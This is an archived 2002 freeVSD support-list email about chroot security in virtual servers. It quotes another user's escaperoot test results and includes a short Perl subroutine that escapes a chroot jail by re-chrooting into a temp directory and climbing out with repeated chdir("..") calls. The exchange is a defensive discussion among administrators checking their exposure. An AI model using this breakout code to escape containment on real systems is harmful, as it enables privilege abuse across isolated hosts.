Re: Chroot security concern

Thu, 05 Sep 2002 15:12:26 -0700 

Ben,

you can have still panic ;)

the escaping is only possible for a root user in the VS (your test as
admin says nothing - sorry) - e.g. if someone gained root by using some
buffer overflows in imapd (as it is possible with some older versions)
he is able to exec some scripts/code as root an in that case the
mentioned escape is possible - it is still possible until you use 2.4.13
as mentioned at the vservers project.

It's even possible with an simple perl code function:

---snip---
sub breakout {

   #tempdir
   mkdir("/usr/local/etc/$$");
   chroot("/usr/local/etc/$$");

   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");
   chdir("..");

   chroot(".");

   #remove tempdir
   system "/bin/rm","-rf","/home/vsd/vs/$login/usr/local/etc/$$";

}

---snip---


that's all - it bites ;)


secure regards


jimmy




Am Thu, 5 Sep 2002 16:03:22 +0100
schrieb Ben Kennish <[EMAIL PROTECTED]>:

> Hi Paul,
> 
> Thursday, September 5, 2002, 3:45:45 PM, you wrote:
> 
> >   tests/escaperoot.cc
> 
> > in the `vserver' source.
> 
> Cheers Paul - it seems that we are secured.  On the host server I get
> (as root)...
> 
> [root@ned root]# ./escaperoot
> test1
> PWD: /root
> PWD: /
> execl /bin/sh failed (No such file or directory)
> test2
> PWD: /root
> PWD: /
> execl /bin/sh failed (No such file or directory)
> All attempts failed
> 
> On a VS (as admin) I get...
> 
> [admin@todd root]$ ./escaperoot
> test1
> PWD: /root
> Can't chroot into dummy_dir (Operation not permitted)
> test2
> PWD: /root
> Can't chroot into dummy_dir (Operation not permitted)
> All attempts failed
> 
> 
> RH7.2, cat /proc/version...
> 
> Linux version 2.4.9-34 ([EMAIL PROTECTED])
> (gcc version 2.96 20000731 (Red Hat Linux 7.2 2.96-108.1))
> #1 Sat Jun 1 06:32:14 EDT 2002
> 
> Panic over (for now) ;)
> 
> -- 
> Kind Regards,
> 
> Ben Kennish
> [EMAIL PROTECTED]
> 
> ------------------------- The freeVSD Support List --------------------------
> Subscribe:   mailto:[EMAIL PROTECTED]?body=subscribe%20freevsd-support
> Unsubscribe: mailto:[EMAIL PROTECTED]?body=unsubscribe%20freevsd-support
> Archives:    http://freevsd.org/support/mail-archives/freevsd-support
> -----------------------------------------------------------------------------

James T. Koerting
 
KSD Germany
[EMAIL PROTECTED]
 
Murphy's Law: "Anything that can go wrong, will go wrong"
Parkinson's Law: "Work expands to exceed available time"
Koerting's Law: "Don't fight against these laws"


------------------------- The freeVSD Support List --------------------------
Subscribe:   mailto:[EMAIL PROTECTED]?body=subscribe%20freevsd-support
Unsubscribe: mailto:[EMAIL PROTECTED]?body=unsubscribe%20freevsd-support
Archives:    http://freevsd.org/support/mail-archives/freevsd-support
-----------------------------------------------------------------------------

Reply via email to